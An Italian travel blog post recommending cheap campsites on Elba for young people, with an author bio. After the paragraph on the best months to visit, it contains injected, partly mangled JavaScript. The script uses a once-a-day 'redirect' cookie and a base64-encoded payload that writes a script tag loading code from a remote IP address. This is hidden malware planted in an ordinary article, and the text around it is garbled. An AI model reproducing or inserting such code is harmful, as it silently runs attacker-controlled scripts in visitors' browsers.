IMG_0270.1

Campeggi Elba economici per i giovani vacanzieri

Voglia di vacanze low cost con gli amici? Ci sono sempre i campeggi economici sull’isola d’elba

Con i primi caldi primaverili ed i primi ponti di festa, comincia proprio a venir voglia di andare al mare e godersi le giornate di sole. Per chi non vuole pianificare troppo le proprie vacanze o per chi semplicemente non vuole spendere troppo, il campeggio è una delle soluzioni più economiche e divertenti e che si adatta anche alle decisioni dell’ultimo momento.

Se volete scegliere la Toscana, sono tantissimi i campeggi all’Elba economici che potete trovare: un fine settimana con gli amici, un viaggio dopo la maturità, le vacanze alla fine della sessione estiva degli esami universitari, trovare campeggi sull’isola d’Elba economici è molto facile, soprattutto per i giovani.

Basta uno zaino in spalla e le spiagge da sogno dell’isola sono alla portata di tutti: è sufficiente consultare i prezzi dei campeggi all’isola d’Elba per rendersi conto di quanto sia semplice programmare una vacanza in totale relax senza spendere un capitale.

I migliori campeggi dell’Isola d’Elba sono a vostra disposizione per farvi provare un’esperienza unica, a contatto con la natura, in semplicità ma con la giusta comodità. La cosa importante è scegliere la soluzione che più vi si addice, leggendo ad esempio le recensioni dei campeggi all’Elba su Tripadvisor. Camping multiaccessoriati con piscine, ristoranti e supermercati, aree spartane dove piantare la propria tenda e suonare la chitarra intorno ai falò sulla spiaggia oppure bungalow di legno con aria condizionata, bagno privato, TV, microonde, sempre nel rispetto di un budget contenuto? Sfogliando i campeggi sull’Isola d’Elba con Tripadvisor potrete scegliere la meta dei vostri sogni senza privarvi delle vostre comodità abituali oppure vivere una vacanza in riva al mare fuori dalla normalità rinunciando a tutto il superfluo. Aprile, Maggio, Settembre ed Ottobre sono i mesi migliori per chi cerca la pace e relax, ma se è la movida dell’isola che vi interessa, allora Giugno, Luglio ed Agosto fanno per voi. _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

Share this post

Federica Mazzei

Elbana di nascita, giramondo per natura. Nata nel 1984 consegue nel 2007 una laurea triennale in Comunicazione sociale e nel 2009 una laurea magistrale con lode in Sistemi e progetti di comunicazione, prosegue il percorso formativo con una borsa di studio di due anni presso la Scuola Superiore Sant'Anna di Pisa (attività di supporto e potenziamento Ufficio Relazioni con il Pubblico, progettazione Piani integrati a livello di Zona distretto). Esperienze lavorative nel settore delle relazioni al pubblico, negli enti del terzo settore e nella comunicazione digitale.

Nessun commento

Aggiungi commento